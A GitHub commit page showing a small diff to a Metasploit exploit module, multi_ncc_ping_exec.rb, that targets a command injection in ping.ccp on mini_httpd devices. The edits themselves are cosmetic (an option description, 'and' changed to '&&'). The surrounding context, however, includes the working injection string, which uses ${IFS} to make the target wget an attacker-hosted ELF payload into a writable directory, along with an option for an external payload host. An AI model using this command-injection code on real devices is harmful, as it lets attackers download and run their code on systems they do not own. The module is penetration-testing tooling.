Skip to content

Commit b7f469b

Browse files
author
m-1-k-3
committed
feedback
1 parent 819a49b commit b7f469b

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

modules/exploits/linux/http/multi_ncc_ping_exec.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -70,7 +70,7 @@ def initialize(info = {})
7070
[
7171
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
7272
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
73-
OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/ping.ccp']),
73+
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
7474
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
7575
], self.class)
7676
end
@@ -83,7 +83,7 @@ def check
8383
})
8484

8585
# unknown if other devices also using mini_httpd
86-
if res && [500].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /mini_httpd/
86+
if res && [500].include?(res.code) && res.headers["Server"] && res.headers["Server"] =~ /mini_httpd/
8787
return Exploit::CheckCode::Detected
8888
end
8989
rescue ::Rex::ConnectionError
@@ -156,7 +156,7 @@ def wget_payload
156156

157157
cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
158158
res = exec_command(cmd)
159-
if res && [200].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /mini_httpd/
159+
if res && [200].include?(res.code) && res.headers["Server"] && res.headers["Server"] =~ /mini_httpd/
160160
register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
161161
else
162162
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")

0 commit comments

Comments
 (0)